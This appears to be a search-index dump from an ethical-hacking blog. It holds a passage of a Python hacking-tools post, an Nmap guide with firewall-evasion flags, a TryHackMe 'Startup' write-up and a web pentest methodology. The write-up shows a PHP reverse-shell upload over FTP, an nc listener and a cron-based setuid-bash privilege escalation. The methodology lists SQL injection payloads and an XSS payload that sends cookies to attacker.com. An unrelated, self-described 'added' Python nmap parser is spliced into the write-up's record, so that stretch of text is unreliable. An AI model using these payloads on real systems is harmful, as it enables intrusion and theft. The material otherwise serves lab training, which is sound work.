class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eget\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003efull_url\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003etimeout\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e3\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eallow_redirects\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"kc\"\u003eFalse\u003c/span\u003e\u003cspan 
class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003eresp\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003estatus_code\u003c/span\u003e \u003cspan class=\"ow\"\u003enot\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"p\"\u003e[\u003c/span\u003e\u003cspan class=\"mi\"\u003e404\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"mi\"\u003e403\u003c/span\u003e\u003cspan class=\"p\"\u003e]:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e            \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"n\"\u003efull_url\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eresp\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003estatus_code\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003eexcept\u003c/span\u003e \u003cspan class=\"n\"\u003erequests\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eRequestException\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003epass\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"kc\"\u003eNone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan 
class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003edir_bruteforce\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003eurl\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003ewordlist_path\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003ewith\u003c/span\u003e \u003cspan class=\"nb\"\u003eopen\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003ewordlist_path\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"k\"\u003eas\u003c/span\u003e \u003cspan class=\"n\"\u003ef\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003ewords\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"p\"\u003e[\u003c/span\u003e\u003cspan class=\"n\"\u003eline\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003estrip\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e \u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003eline\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"n\"\u003ef\u003c/span\u003e \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003eline\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003estrip\u003c/span\u003e\u003cspan class=\"p\"\u003e()]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003ewith\u003c/span\u003e \u003cspan class=\"n\"\u003eThreadPoolExecutor\u003c/span\u003e\u003cspan 
class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003emax_workers\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e20\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"k\"\u003eas\u003c/span\u003e \u003cspan class=\"n\"\u003eexecutor\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"n\"\u003eexecutor\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003emap\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"k\"\u003elambda\u003c/span\u003e \u003cspan class=\"n\"\u003ew\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e \u003cspan class=\"n\"\u003echeck_path\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003eurl\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003ew\u003c/span\u003e\u003cspan class=\"p\"\u003e),\u003c/span\u003e \u003cspan class=\"n\"\u003ewords\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e            \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e                \u003cspan class=\"nb\"\u003eprint\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"sa\"\u003ef\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;[\u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan 
class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e[\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e]\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e] \u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e[\u003c/span\u003e\u003cspan class=\"mi\"\u003e0\u003c/span\u003e\u003cspan class=\"p\"\u003e]\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003edir_bruteforce\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;http://target.com\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"s2\"\u003e\u0026#34;/usr/share/wordlists/dirb/common.txt\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ssh-with-paramiko\"\u003eSSH with Paramiko\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003eparamiko\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan 
class=\"nf\"\u003essh_connect\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eusername\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003epassword\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e22\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"n\"\u003eclient\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003eparamiko\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eSSHClient\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"n\"\u003eclient\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eset_missing_host_key_policy\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003eparamiko\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eAutoAddPolicy\u003c/span\u003e\u003cspan class=\"p\"\u003e())\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003etry\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003eclient\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003econnect\u003c/span\u003e\u003cspan 
class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eusername\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"n\"\u003eusername\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003epassword\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"n\"\u003epassword\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003etimeout\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e5\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003e_\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003estdout\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003e_\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003eclient\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eexec_command\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;id \u0026amp;\u0026amp; hostname\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"nb\"\u003eprint\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003estdout\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan 
class=\"n\"\u003eread\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003edecode\u003c/span\u003e\u003cspan class=\"p\"\u003e())\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003eclient\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eclose\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"kc\"\u003eTrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003eexcept\u003c/span\u003e \u003cspan class=\"n\"\u003eparamiko\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eAuthenticationException\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"kc\"\u003eFalse\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"recommended-projects-to-build\"\u003eRecommended Projects to Build\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003ePort Scanner\u003c/strong\u003e ← Start here\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSubdomain Enumeration tool\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eWeb Directory Brute-forcer\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePacket Sniffer\u003c/strong\u003e using Scapy\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSH brute-force\u003c/strong\u003e (authorized targets 
only!)\u003c/li\u003e\n\u003c/ol\u003e","title":"Python for Hackers — Basics to Real Tools"},{"content":"Terms of Use Last updated: April 19, 2026\nEthical Use All educational content on this blog is intended for ethical learning purposes only. Using any information for illegal or harmful purposes is strictly prohibited.\nIntellectual Property All original content is protected by copyright. You may share content with proper attribution to the source.\nDisclaimer The blog provides information \u0026ldquo;as is\u0026rdquo; without warranties. We are not responsible for any misuse of the information provided.\nChanges to Terms We reserve the right to modify these terms at any time. Continued use of the blog constitutes acceptance of the updated terms.\n","permalink":"https://cyberah-blog.pages.dev/en/terms/","title":"Terms of Use"},{"content":"What is Nmap? 
Nmap (Network Mapper) is the most widely used network scanner in security work. Ethical hackers and defenders use it to discover live hosts, open ports, service versions and operating systems.\nBasic Usage\n# Quick scan — the 100 most common ports\nnmap -F 192.168.1.1\n# Full port scan (all 65535 TCP ports)\nnmap -p- 192.168.1.1\n# Subnet scan\nnmap 192.168.1.0/24\nService and Version Detection\n# Detect service versions\nnmap -sV 192.168.1.1\n# OS detection (needs root: it works from raw packets)\nnmap -O 192.168.1.1\n# Recommended comprehensive scan. --min-rate 5000 is fine on a lab network but can make Nmap miss ports on lossy or rate-limited links; drop it when a result looks incomplete.\nnmap -sV -sC -O -p- --min-rate 5000 192.168.1.1\nScan Types\nSYN Scan (-sS): the default when run as root; fast, and never completes the TCP handshake.\nTCP Connect (-sT): the default without root privileges; completes the handshake, so the service itself logs the connection.\nUDP Scan (-sU): for UDP services such as DNS, SNMP and NTP; slow, because closed ports answer with rate-limited ICMP.\nNULL Scan (-sN): can slip past stateless packet filters; unreliable against Windows and many network devices, which answer every probe with RST so all ports look closed.\nXmas Scan (-sX): same idea as -sN with FIN, PSH and URG set; same limitations.\nsudo nmap -sS 192.168.1.1\nsudo nmap -sU -p- 192.168.1.1\nNmap Scripting Engine (NSE) The real power of Nmap lies in its script library.\n# Default scripts (equivalent to --script=default)\nnmap -sC 192.168.1.1\n# Vulnerability scripts. These are intrusive and can crash fragile services; run them only against targets you are authorized to test.\nnmap --script vuln 192.168.1.1\n# Specific scripts\nnmap --script=smb-vuln-ms17-010 192.168.1.1\nnmap --script=http-enum,http-headers,http-methods 192.168.1.1\nFirewall Evasion\n# Fragment packets into 8-byte pieces\nnmap -f 192.168.1.1\n# Custom MTU (must be a multiple of 8)\nnmap --mtu 24 192.168.1.1\n# Decoy scan: mixes 10 random source addresses in with your own; your real address is still among them\nnmap -D RND:10 192.168.1.1\n# Use a source port that naive filters trust (-g is the short form)\nnmap --source-port 53 192.168.1.1\n# Timing templates (T0 = slowest and quietest, T5 = fastest and noisiest)\nnmap -T1 192.168.1.1\nSaving Output\nnmap -oN output.txt 192.168.1.1   # Normal text\nnmap -oX output.xml 192.168.1.1   # XML, the format other tools parse\nnmap -oA all_formats 192.168.1.1  # Normal, XML and grepable at once\nReady-to-Use Commands\n# Full comprehensive scan\nsudo nmap -sV -sC -p- --min-rate 5000 -oN full_scan.txt TARGET\n# Quick CTF scan\nnmap -sV -sC -p 21,22,80,443,445,8080 TARGET\n# Web targeting\nnmap --script=http-title,http-headers,http-methods -p 80,443 TARGET\n","permalink":"https://cyberah-blog.pages.dev/en/tools/nmap-complete-guide/","title":"The Complete Nmap Guide — Beginner to Pro"},
{"content":"\nBox Info\nPlatform: TryHackMe\nDifficulty: Easy\nOS: Linux\nSkills: FTP, File Upload RCE, Cron Privesc\nPhase 1: Reconnaissance\nnmap -sV -sC -p- --min-rate 5000 10.10.X.X\n# Results:\n# PORT   STATE SERVICE VERSION\n# 21/tcp open  ftp     vsftpd 3.0.3\n# 22/tcp open  ssh     OpenSSH 7.2p2\n# 80/tcp open  http    Apache 2.4.18\nPhase 2: FTP Anonymous Access\nftp 10.10.X.X\n# Username: anonymous\n# Password: (empty)\nftp\u0026gt; ls -la\n# Found: notice.txt, important.jpg\nftp\u0026gt; get notice.txt\nftp\u0026gt; get important.jpg\nPhase 3: Web Enumeration\ngobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirb/common.txt\n# Found:\n# /files (200)  ← Shared with FTP! The FTP root and this web directory are the same folder, so anything uploaded over FTP is served over HTTP.\n
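Added example in Python, not code from this blog or from the writeup: the Nmap guide above ends with saving results as XML (-oX), and the Phase 1 scan of this writeup is exactly the kind of result you would save that way. The function below parses nmap XML into the open ports, drops filtered and closed ones, and builds the targeted second-stage -sV -sC command, so the full-port sweep and the slow script scan become two separate steps instead of one long run. The XML is constructed by hand to mirror the Phase 1 results plus one filtered port; 10.10.X.X is the redacted placeholder the writeup uses, and the output prefix "targeted" is an arbitrary choice.

```python
"""Parse nmap -oX output into open ports and build a targeted follow-up scan.

Added example, not code from the blog. SAMPLE_NMAP_XML is constructed by hand
to mirror the writeup's Phase 1 results (21, 22, 80 open) plus a filtered 443;
10.10.X.X is the writeup's redacted placeholder address.
"""
import shlex
import xml.etree.ElementTree as ET
from dataclasses import dataclass

SAMPLE_NMAP_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap -sV -sC -p- -oX scan.xml 10.10.X.X">
  <host>
    <address addr="10.10.X.X" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="vsftpd" version="3.0.3"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.2p2"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.18"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="filtered" reason="no-response"/>
        <service name="https"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


@dataclass(frozen=True)
class OpenPort:
    host: str
    protocol: str
    port: int
    service: str
    product: str
    version: str


def parse_open_ports(xml_text: str) -> list[OpenPort]:
    """Return every port whose <state> is 'open', with the service banner fields."""
    root = ET.fromstring(xml_text)
    found: list[OpenPort] = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address")
        addr = addr_el.get("addr", "?") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed / filtered ports carry no banner worth rescanning
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}
            found.append(OpenPort(
                host=addr,
                protocol=port.get("protocol", "tcp"),
                port=int(port.get("portid")),
                service=attrs.get("name", ""),
                product=attrs.get("product", ""),
                version=attrs.get("version", ""),
            ))
    return found


def followup_command(ports: list[OpenPort], output_prefix: str = "targeted") -> str:
    """Second-stage scan: -sV -sC only on the TCP ports the sweep found open."""
    tcp_ports = sorted({p.port for p in ports if p.protocol == "tcp"})
    if not tcp_ports:
        raise ValueError("no open TCP ports to rescan")
    host = ports[0].host
    argv = ["nmap", "-sV", "-sC", "-p", ",".join(map(str, tcp_ports)),
            "-oA", output_prefix, host]
    return shlex.join(argv)  # shell-safe even if a field ever contains spaces


def web_ports(ports: list[OpenPort]) -> list[int]:
    """Ports worth pointing gobuster or ffuf at: whatever nmap fingerprinted as HTTP(S)."""
    return sorted(p.port for p in ports
                  if p.service in ("http", "https", "http-proxy", "http-alt"))


if __name__ == "__main__":
    open_ports = parse_open_ports(SAMPLE_NMAP_XML)
    for p in open_ports:
        print(f"{p.port}/{p.protocol}  {p.service:<6} {p.product} {p.version}".rstrip())
    print(followup_command(open_ports))
    print("web ports:", web_ports(open_ports))
```

In practice run the sweep with -p- and -oX first, feed the file to parse_open_ports, and let followup_command produce the script scan; the filtered 443 in the sample shows why the state check matters, since -sV against a filtered port only wastes time.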
Phase 4: RCE via PHP Shell Upload\n# Upload a PHP reverse shell through the anonymous FTP account. Set the callback address inside shell.php to your machine and its port to the one the listener below uses (4444).\nftp 10.10.X.X\nftp\u0026gt; put shell.php\n# Start the listener before triggering the shell\nnc -lvnp 4444\n# Trigger the shell from the browser; the web server executes the file the FTP server wrote:\n# http://10.10.X.X/files/shell.php\nWe have a shell!\n# Upgrade to an interactive TTY\npython3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39;\nexport TERM=xterm\nPhase 5: Privilege Escalation\n# Check cron jobs\ncat /etc/crontab\n# Found: a script that cron runs as root and that our low-privileged user can write to\n# Append a line that makes bash setuid-root the next time the job fires\necho \u0026#34;chmod +s /bin/bash\u0026#34; \u0026gt;\u0026gt; /path/to/script.sh\n# Wait for cron...\n# -p keeps the setuid effective uid instead of dropping back to our own\n/bin/bash -p\n# root#\nFlags\nuser.txt: THM{XXXXXXXXXXXXXXXXXX}\nroot.txt: THM{XXXXXXXXXXXXXXXXXX}\nLessons Learned\nAnonymous FTP, and above all anonymous write access, should be disabled on production systems.\nAn FTP directory that the web server also serves, and from which it executes PHP, turns any upload into remote code execution; keep upload directories outside the web root or serve them with script execution disabled.\nA cron job that runs as root but executes a script an unprivileged user can write is a trivial privilege escalation; root-run scripts must be owned by root and writable by nobody else.\n","permalink":"https://cyberah-blog.pages.dev/en/writeups/thm/thm-startup/","title":"TryHackMe — Startup | Full Writeup"},
{"content":"Phase 1: Reconnaissance\nReconnaissance is the foundation of any successful penetration test. 
The more information you gather, the higher your chances of finding vulnerabilities.\nPassive Recon — Without Touching the Target\nwhois, Shodan and search-engine dorks never send a packet to the target. The DNS lookups below do reach the target\u0026rsquo;s name servers, so treat them as low-noise rather than invisible.\n# DNS information gathering\nwhois target.com\ndig target.com ANY   # many resolvers refuse ANY (RFC 8482); fall back to A, AAAA, MX, NS and TXT\nsubfinder -d target.com -o subdomains.txt\n# Google Dorks\nsite:target.com filetype:pdf\nsite:target.com inurl:admin\nsite:target.com \u0026#34;index of /\u0026#34;\n# Shodan for infrastructure intel\nshodan search hostname:target.com\nActive Recon — Direct Scanning\n# Port and service scanning\nnmap -sV -sC -p- --min-rate 5000 -oN scan.txt target.com\n# Directory discovery (-fc 404 hides not-found responses)\nffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -fc 404\n# Subdomain brute-forcing. The wordlist here must hold bare labels such as api or dev; the subfinder output above already contains full hostnames, so do not reuse it as-is.\nffuf -u https://FUZZ.target.com -w subdomains.txt -fc 404\nPhase 2: Enumeration\nAfter discovering the target, we dive deep into understanding the application.\nApplication Analysis\nIdentify technologies in use (Wappalyzer, WhatWeb)\nMap all entry points (login, upload, API endpoints)\nAnalyze JavaScript files for hidden endpoints\nInspect HTTP headers for sensitive information leaks\nwhatweb -a 3 https://target.com\nnikto -h https://target.com -ssl\npython3 LinkFinder.py -i https://target.com -d\nPhase 3: Vulnerability Discovery\nTop Vulnerabilities to Check (OWASP Top 10)\nSQL Injection: 🔴 High. Tools: sqlmap, manual\nXSS: 🟡 Medium. Tools: XSStrike, Dalfox\nSSRF: 🔴 High. Tools: manual, Burp Suite\nIDOR: 🟡 Medium. Tools: manual\nFile Upload: 🔴 High. Tools: manual\nSQL Injection — Manual Testing\n-- Basic tests\n\u0026#39; OR \u0026#39;1\u0026#39;=\u0026#39;1\n\u0026#39; OR 1=1--\n\u0026#39; UNION SELECT NULL,NULL,NULL--   -- add NULLs until the column count matches\n-- Time-based blind (a 5-second delay in the response confirms injection)\n\u0026#39;; WAITFOR DELAY \u0026#39;0:0:5\u0026#39;--   -- Microsoft SQL Server\n\u0026#39; AND SLEEP(5)--   -- MySQL / MariaDB\nPhase 4: Exploitation\n⚠️ Warning: Only exploit systems you have explicit authorization to test.\n# SQL Injection with sqlmap (--level=5 also tests cookies and request headers; --batch accepts the defaults without prompting)\nsqlmap -u \u0026#34;https://target.com/page?id=1\u0026#34; --dbs --batch --level=5\n# XSS cookie theft payload (only reaches cookies that lack the HttpOnly flag)\n\u0026lt;script\u0026gt;fetch(\u0026#39;https://attacker.com/steal?c=\u0026#39;+document.cookie)\u0026lt;/script\u0026gt;\nPhase 5: Reporting\nA good report must include:\nExecutive Summary (non-technical, for management)\nTechnical Details for each finding, with a CVSS score and the vector it was derived from\nProof of Concept steps\nRemediation Recommendations\nReferences and Resources\n","permalink":"https://cyberah-blog.pages.dev/en/notes/methodology-web-pentest/","title":"Web Penetration Testing Methodology — Zero to Pwned"}]